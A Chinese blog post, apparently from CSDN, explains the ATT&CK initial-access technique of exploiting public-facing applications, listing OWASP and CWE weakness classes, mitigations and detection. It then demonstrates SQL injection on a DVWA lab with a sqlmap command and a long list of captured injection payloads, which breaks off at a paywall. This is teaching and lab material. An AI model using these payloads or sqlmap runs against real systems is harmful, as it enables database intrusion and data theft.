ATT & CK 阶段之Initial Access --Exploit Public-Facing Application

最新推荐文章于 2024-03-07 16:28:10 发布
最新推荐文章于 2024-03-07 16:28:10 发布
阅读量1.6k 收藏 4
点赞数 2
分类专栏: ATT & CK 文章标签: dvwa sql injection sqlmap web安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sojrs_sec/article/details/105659280
版权

Exploit Public-Facing Application:即攻击对外开放的服务。这些服务通常为Web,也可能是数据库、标准服务如SMB、SSH 或者其他通过sockets能访问到的服务。

可选择的攻击手法

对外开放的服务主要以Web和数据库为主,针对这两种类型,可以关注owasp top 10以及CWE top 25

  1. Owasp top 10
    1. 注入。如sql注入,OS注入,LDAP注入等
    2. 不恰当的认证。即认证绕过,通过泄漏的账号等
    3. 敏感数据泄漏。如敏感API
    4. XXE。
    5. 失效的访问控制。如通过越权获取敏感数据、提升权限等
    6. 错误的安全配置。默认配置不安全
    7. XSS
    8. 不安全的反序列化
    9. 已知组件的漏洞
    10. 日志监控不足
  2. CWE top 25
    1. CWE-119 对内存缓冲区内的操作限制不当
    2. CWE-79 跨站脚本
    3. CWE-20 输入验证不当
    4. CWE-200 信息泄露
    5. CWE-125 越界读取
    6. CWE-89 SQL注入
    7. CWE-416 释放后重用
    8. CWE-190 整数溢出或环绕
    9. CWE-352 跨站请求伪造
    10. CWE-22 路径遍历
    11. CWE-78 OS命令注入
    12. CWE-787 越界写入
    13. CWE-287 授权不当
    14. CWE-476 空指针逆向引用
    15. CWE-732 对关键资源的权限分配错误
    16. CWE-434 未限制上传威胁类型的文件
    17. CWE-611 对XML外部实体引用限制不当
    18. CWE-94 代码注入
    19. CWE-798 使用硬编码凭据
    20. CWE-400 不受控制的资源消耗
    21. CWE-772 有效生命期后未能释放资源
    22. CWE-426 不可信的搜索路径
    23. CWE-502 对不可信的数据反序列化
    24. CWE-269 权限管理不当
    25. CWE-295 证书验证不当

缓解措施

  1. 应用隔离和沙盒。如docker
  2. 攻击防护。如Web应用防火墙
  3. 网络隔离。即进行网络划分,DMZ区
  4. 账号权限控制。即对每个对外开放的服务,设置最小权限的账号运行
  5. 软件更新
  6. 漏洞扫描。定期进行漏洞扫描

检测方式

  1. 应用日志监控。可以发现潜在或已经成功的一些攻击
  2. Web应用防火墙。监控发现一些不正常或攻击行为

Exploit Public-Facing Application 利用演示( SQL注入)

这里以dvwa为靶机配合sqlmap进行注入演示,搭建过程不表

1. Dvwa 安全等级为low时

抓包获得请求包,保存在aa.txt

GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.43.55
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.43.55/dvwa/vulnerabilities/sqli/
Cookie: security=low; PHPSESSID=thfau2ofgrqbn2p0fodmprp713
Upgrade-Insecure-Requests: 1

sqlmap执行

Sqlmap -r aa.txt —dbs --batch

成功获取到其数据库名列表
在这里插入图片描述
这里我在dvwa里加了几句代码,记录sqlmap注入的主要一些语句

$fp = fopen("sqlmap.txt", "a");
fwrite($fp, $query."\r\n");
fclose($fp);

在这里插入图片描述

查看sqlmap.txt依此发现主要有以下payload

1(').)))..”
1'fDjLBt<'">pwFrMe
1) AND 6333=9344 AND (4623=4623
1) AND 4248=4248 AND (9599=9599
1 AND 2775=8639
1 AND 4248=4248
1 AND 4120=2112-- Gous
1 AND 4248=4248-- nNEX
1') AND 1498=2480 AND ('HmyD'='HmyD
1') AND 4248=4248 AND ('OvUJ'='OvUJ
1' AND 2150=9004 AND 'xLOZ'='xLOZ
1' AND 4248=4248 AND 'POlE'='POlE
1' AND 4282=8305 AND 'AifD'=‘AifD
(SELECT (CASE WHEN (9027=3511) THEN 1 ELSE (SELECT 3511 UNION SELECT 3208) END))
(SELECT (CASE WHEN (9001=9001) THEN 1 ELSE (SELECT 2292 UNION SELECT 1880) END))
1) AND 9819=8399#
1) AND 3197=3197#
1)) AND 5386=6564#
1)) AND 3197=3197#
1))) AND 9530=9202#
1))) AND 3197=3197#
1 AND 4940=6897#
1 AND 3197=3197#
1)) AS FFRM WHERE 8501=8501 AND 4858=1954#
1)) AS GCXV WHERE 5735=5735 AND 3197=3197#
1) AS xdch WHERE 2009=2009 AND 2607=9705#
1) AS Savx WHERE 2268=2268 AND 3197=3197#
1` WHERE 8279=8279 AND 2839=8914#
1` WHERE 2940=2940 AND 3197=3197#
1`) WHERE 1840=1840 AND 1431=8600#
1`) WHERE 4728=4728 AND 3197=3197#
1') AND 9880=8210#
1') AND 3197=3197#
1' AND 1999=6529#
1' AND 3197=3197#
1' AND 6733=3944#
1" AND 7252=8487#
1" AND 3197=3197#
1')) AND 4099=7850#
1')) AND 3197=3197#
1'))) AND 4488=2453#
1'))) AND 3197=3197#
1") AND 9985=3085#
1") AND 3197=3197#
1")) AND 3749=8195#
1")) AND 3197=3197#
1"))) AND 8400=1024#
1"))) AND 3197=3197#
1')) AS LnoW WHERE 1042=1042 AND 2785=9517#
1')) AS Nkmr WHERE 8969=8969 AND 3197=3197#
1")) AS YZIT WHERE 8680=8680 AND 8087=3673#
1")) AS ZQoV WHERE 5245=5245 AND 3197=31
最低0.47元/天 解锁文章
sojrs_sec
关注
专栏目录
TA0001 初始访问 Initial Access
b10d9的博客
05-05 1882
战术目标 战术主要是利用各种技术,在目标网络中获得最初的立足点,并确保后续能够通过立足点持续访问目标网络。 水坑攻击 Drive-by Compromise Drive-by Compromise通常不是直接对目标系统发起攻击,而是通过对用户访问的网站的控制,对网站注入恶意代码,当目标系统的用户访问网站加载运行恶意代码后,获取目标系统的访问或获取系统上的应用访问令牌,如OAuth令牌。典型的有跨站脚本攻击(XSS)。通过水坑攻击,控制内网用户系统,获得最初的立足点。 官方给出的典型Drive-by
初始接入(Initial access)和同步(Synchronization
Bangzhao的博客
01-03 2543
UE检测到PSS和SSS之后即获得了系统的下行同步; UE完成物理层随机接入之后,利用BS反馈的上行定时调整量获得系统的上行同步。 UE 进行小区搜索 发生时机 : UE开机或者需要进行小区切换 主要行为 : BS定期发送同步信号,UE对小区同步信号进行检测 主要结果 : 获得小区的下行同步。 (1)时间同步检测(检测出同步信号位置,检测出子帧CP类型,检测出小区ID号); (
ATT & CK 阶段Initial Access --Drive-by Compromise
sojrs_sec的博客
04-20 2106
Drive-by Compromise:通过受害者正常浏览网页去获取系统控制权限的一种技术手段。既可以通过浏览器或网页直接进行攻击,也可通过网页去获取相关认证的凭证 可选择的攻击手法 通过前端代码注入,如JS\IFrame\CSS 通过正常的广告渠道付费进行传播恶意广告内容 通过网页的交互页面插入恶意代码或对象,该代码可在其他用户端展示,如评论区、公告区 典型的攻击流程 受害者访问一个被黑客...
滲透测试ATT&CK攻击模型三(Initial Access 初始访问)
Mr.mark的博客
07-21 2170
攻击者试图进入目标网络,使用目标网络对外暴露的各种入口在目标网络中获得立足点。获得初始访问立足点的技术主要包括网络钓鱼或利用对外开放的web服务上的漏洞等。攻击者在获得立足点后可进行持久化和权限提升操作(例如:使用外部远程服务、获取有效账户等)或修改密码进行限制目标拥有者使用。 目录 T1189 Drive-by Compromise 水坑攻击 T1190 Exploit Public-Facing Application 利用公开漏洞 T1133 External Remote Service
MITRE ATT&CK安全知识库介绍
ybdesire的专栏
09-26 1万+
1. 引入 通过学习MITRE ATT&CK,能快速对安全领域做一个全面的了解。 本文只是对MITRE ATT&CK做一个初步介绍,更深入的内容后续还会再写。 2. MITRE是什么 从wikipedia[1]上可以看到介绍: The Mitre Corporation (stylized as The MITRE Corporation and MITRE) is an Amer...
bat笔试题java-EDR-Testing-Script:使用执行各种ATT&CK/LOLBAS/Invoke-CradleCrafter/
06-13
ATT&CK/LOLBAS/Invoke-CradleCrafter 框架测试 EDR 解决方案。 这个项目现在还处于起步阶段。 它被编写为单个批处理脚本,因此可以轻松上传和运行(而不是解压缩、编译和安装)。 该脚本可以以普通用户或管理员身份...
ATT&CK v10版本战术介绍-执行(上篇)
ducc20180301的博客
05-13 659
在前几期文章中我们介绍了ATT&CK中侦察、资源开发、初始访问战术理论知识及实战研究,本期我们为大家介绍ATT&CK 14项战术中的执行战术前6项技术内容,下期介绍执行战术后6项技术内容,敬请关注。
ATT&CK手册(修改版)
09-16
1. **攻击框架**:ATT&CK模型按照攻击阶段划分,包括预攻击、初始访问、执行、持久化、权限提升、防御规避、凭证访问、发现、横向移动、收集、命令与控制、数据泄露和影响等阶段。每个阶段下又细分多种攻击技术。 2...
HTB Arctic[ATT&CK模型]writeup系列7
重新启程
02-05 3601
目录 0x00 靶机情况 0x01 ATT&CK ATT&CK能用来干什么? 网空威胁行为体(CyberThreat Actors) ATT&CK模型 TTP的定义 0x02 PRE-ATT&CK 一、Priority Definition(优先级定义) 二、Target Selection(选择目标) 三、Information Gat...
【读书笔记】针对ICS的ATT&CK矩阵详解(一)
最新发布
tpriwwq的专栏
03-07 1114
Att&CK for ICS Matrix
网站被攻击怎么解决并修复网站漏洞
网站安全专家
07-29 618
很多公司的网站被攻击,导致网站打开跳转到别的网站上去,网站快照也被篡改,收录一些非法的内容快照,有些网站数据库都被篡改,修改了会员资料,数据库被删除,等等攻击症状,我们SINE安全在解决客户网站被攻击的问题,发现都是由于网站存在漏洞导致的,攻击者利用网站的漏洞对网站进行攻击,上传webshell文件,进而对网站进行篡改。 那么该如何查找网站目前存在的漏洞?并对其修复防止网站被攻击呢?我们SINE...
Go 语言编程 — go-swagger OpenAPI 工具
烟云的计算
09-12 5027
目录 文章目录目录go-swagger参考文档 go-swagger go-swagger 是一个 Golang 的第三方库,是一个 Swagger 2.0(aka OpenAPI 2.0)的 Golang 实现。 Github:https://github.com/go-swagger/go-swagger go-swagger 内含了许多包,其中关键得有: go-openapi:OpenAPI 的 Golang 实现。 govalidator:可以对 Golang 的字符串、结构体以及集合进行校验
python3下载远程代码并执行
weixin_33962621的博客
09-01 479
第一步: 先在gist之类的网站上贴上代码,目的不是高亮,而可以raw的形式获取代码,这样可以省掉处理html的时间,我这里用的是pasteraw: 远程上的代码:http://cdn.pasteraw.com/6hwu5u4ujhdv5gvyh07qrahb9d0orer tkinter代码的兼容性真是超好,我基本抄的十年前教程上的代码,其中代码如下,那些奇怪的字符是原型是一个2K的MP3文件:...
sql注入(dvwa)
zhang14916的博客
01-22 1225
1.information_schema库(简介) information_schema提供对数据库元数据的访问,有关MySQL服务器信息,例如数据库或表的名称,列的数据类型或访问权限。 information_schema是每个MySQL实例中的数据库,该实例存储有关MySQL服务器维护的所有其他数据库的信息。该 information_schema数据库包含几个只读表。它们实际上是视图,而...
零信任实践之单包认证(SPA)
热门推荐
sojrs_sec的博客
04-23 1万+
概况 随着零信任概念的越来越火热,产业界也都在考虑如何将零信任的理念落地到实践中。这其中SDP推动零信任的实践路上走出了一大步,所谓SDP又称软件定义边界,理论上来说可以替代传统的物理边界。SDP边界之间自有一套自己的认证和授权体系,与传统的通过账号密码认证不同。在这众多认证和授权体系当中,我们有必要了解一下SPA即单包认证的思路和实践 SPA/PK是什么 Port Knocking[PK]:字面...
inf 格式详解
sojrs_sec的博客
05-07 3314
概况 在ATT&CK 战术学习中,我们经常会看到使用inf安装文件进行绕过从而达到命令执行效果的情况,从网络上包括微软官方,发现对inf中涉及到的sections内容不是很完整,sections里面的条目的材料就更少了,本文简单介绍一种方法去了解inf中涉及到的sections及条目 常用inf格式 首先我们来看一个黑客经常利用的inf文档 [version] Signature=$chi...
构建与运营企业内部ATT&CK框架
"本文档主要讨论了如何在企业内部建立和运营ATT&CK框架,以及其更新和路线图。ATT&CK是由MITRE创建的一种基于已知攻击技术的知识库,旨在帮助组织理解和防御高级持续性威胁(APT)的攻击手法。文档提到了ATT&CK的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值